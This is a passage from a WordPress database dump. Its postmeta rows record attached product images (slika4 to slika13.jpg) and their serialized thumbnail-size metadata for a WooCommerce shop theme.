:6:\"height\";i:950;s:4:\"file\";s:18:\"2018/02/slika7.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"slika7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"slika7-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"slika7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"slika7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"slika7-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:18:\"slika7-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:18:\"slika7-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:18:\"slika7-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:18:\"slika7-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:18:\"slika7-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"slika7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"slika7-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2353,4344,'_wp_attached_file','2018/02/slika4.jpg'),(2354,4344,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:18:\"2018/02/slika4.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"slika4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"slika4-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"slika4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"slika4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"slika4-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:18:\"slika4-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:18:\"slika4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:18:\"slika4-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:18:\"slika4-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:18:\"slika4-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"slika4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"slika4-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2355,2789,'_wp_attachment_image_alt','a'),(2356,2790,'_wp_attached_file','2018/02/slika8.jpg'),(2357,2790,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:18:\"2018/02/slika8.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"slika8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"slika8-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"slika8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"slika8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"slika8-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:18:\"slika8-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:18:\"slika8-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:18:\"slika8-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:18:\"slika8-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:18:\"slika8-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"slika8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"slika8-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2358,4344,'_wp_attachment_image_alt','a'),(2359,2787,'_wp_attachment_image_alt','a'),(2360,2788,'_wp_attachment_image_alt','a'),(2361,2789,'_wp_attachment_image_alt','a'),(2362,2790,'_wp_attachment_image_alt','a'),(2363,2791,'_wp_attached_file','2018/02/slika9.jpg'),(2364,2791,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:18:\"2018/02/slika9.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"slika9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"slika9-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"slika9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"slika9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"slika9-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:18:\"slika9-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:18:\"slika9-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:18:\"slika9-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:18:\"slika9-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:18:\"slika9-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"slika9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"slika9-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2365,2790,'_wp_attachment_image_alt','a'),(2366,2791,'_wp_attachment_image_alt','a'),(2367,2792,'_wp_attached_file','2018/02/slika10.jpg'),(2368,2792,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:19:\"2018/02/slika10.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"slika10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"slika10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"slika10-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slika10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slika10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slika10-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"slika10-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"slika10-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"slika10-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:19:\"slika10-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:19:\"slika10-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"slika10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"slika10-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"slika10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2369,2791,'_wp_attachment_image_alt','a'),(2370,2792,'_wp_attachment_image_alt','a'),(2371,2793,'_wp_attached_file','2018/02/slika11.jpg'),(2372,2793,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:19:\"2018/02/slika11.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"slika11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"slika11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"slika11-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slika11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slika11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slika11-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"slika11-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"slika11-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"slika11-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:19:\"slika11-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:19:\"slika11-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"slika11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"slika11-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"slika11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2373,2792,'_wp_attachment_image_alt','a'),(2374,2793,'_wp_attachment_image_alt','a'),(2375,2794,'_wp_attached_file','2018/02/slika12.jpg'),(2376,2794,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:19:\"2018/02/slika12.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"slika12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"slika12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"slika12-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slika12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slika12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slika12-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"slika12-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"slika12-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"slika12-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:19:\"slika12-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:19:\"slika12-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"slika12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"slika12-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"slika12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2377,2793,'_wp_attachment_image_alt','a'),(2378,2794,'_wp_attachment_image_alt','a'),(2379,2795,'_wp_attached_file','2018/02/slika13.jpg'),(2380,2795,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:19:\"2018/02/slika13.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"slika13-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"slika13-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"slika13-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slika13-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slika13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slika13-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"slika13-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"slika13-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"slika13-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:19:\"slika13-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:19:\"slika13-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"slika13-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"slika13-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"slika13-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2381,2794,'_wp_attachment_image_alt','a